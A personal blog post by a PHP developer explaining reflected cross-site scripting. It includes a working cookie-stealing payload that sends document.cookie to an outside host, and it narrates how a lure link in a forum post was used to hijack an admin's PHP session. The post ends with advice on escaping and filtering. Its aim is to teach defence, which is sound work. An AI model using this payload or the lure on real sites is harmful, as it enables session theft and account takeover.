Ben Maynard's blog about anything

First off, welcome you all to my blog and I hope to keep it updated. The main things I will be talking about is PHP and mainly the security sides of it. To give you a quick background, I have been working full time as a PHP developer in the web industry for just over 2 years, and a year prior I was at tafe doing a cert 4 in website design and a diploma in website development.

My first post will be about Cross-site Scripting (XSS) attacks, which I have had to deal with this week. XSS IS A HUGE AND DANGEROUS issue posed in any web application, which allows the attacker to inject code into your application. The most popular type of XSS attack is injecting HTML or javascript into the browser output. This is caused when the developer does not correctly sanitize their input, and prints it out to the browser. There are also more powerful XSS attacks which injects code into the actual application eg: when including a php file, you grab the file name straight from the browser, but I will not go into this because frankly if your application contains a security issue like this……..well you have chosen the wrong industry (ok, you’re learning, well I suppose your excused).

A common XSS exploit is to grab the contents of the cookies via javascript, and to email/log the results. Bellow is the vulnerable PHP code:

echo “Message: “ . $_GET[‘msg’];

As you can see, I print the input from the user straight to the browser. As an attacker, I could run this url: badfile.php?msg= <script>document.write(‘<img src=”http://visionsource.org/xssattack.php?cookie=’ + document.cookie + ‘”>’);</script>. Now that will email me the contents of the cookies of whoever visits that url. So what you’re saying? Who is ever going to go to that url? The answer is possibly you. Early this week I demonstrated this very hack which in returned allowed me access to the admin control panel of the website. How I did this was on the victim machine, I logged into the admin panel (for the specific attack, I wanted admin access) and then after I was finished in the admin area, I proceeded to the forum which an admin should be visiting since it is their site and all. I then set up a post in the forum, made a link to the made url, gave the link a creative name like “error with website, what’s wrong with it admin?” (creativity, I don’t have it).

The admin then clicked on the link, which emailed me their cookies and contained the user’s PHP Session id. I then went to my machine and changed my PHP Session id to be the value of the victims session, went to the admin panel and wollah I’m in. This is due to the victim was still logged into the admin area and I then stole their session. From here I could create some serious damage, change all the content to whatever I want, make all the pages redirect to a website of myn, anything!

This is a very basic XSS attack, but yet can still create some serious damage to the website in question. Some other forms to make the user visit the special crafted url is to put the link in an image, which automatically gets loaded some as the victim loads the page and it’s possible for the admin to not even notice the attack, giving you more time to hack the website (and more tries). Attacks like this don’t just limit to admins, but even members of the website so I can log into the profile and view pm’s, history of actions on the website etc.

To avoid these attacks, you can run the strip_tags() or htmlspecialchars() or htmlentities() function, but I suggest using a well known third party library to prevent XSS attacks. I recommend HTML Purifier which seems to be one of the best filters out in the market plus its open source.

The one thing you have to remember as a developer is never think it won’t happen to you, because it will, your business will look bad and you could even get fired!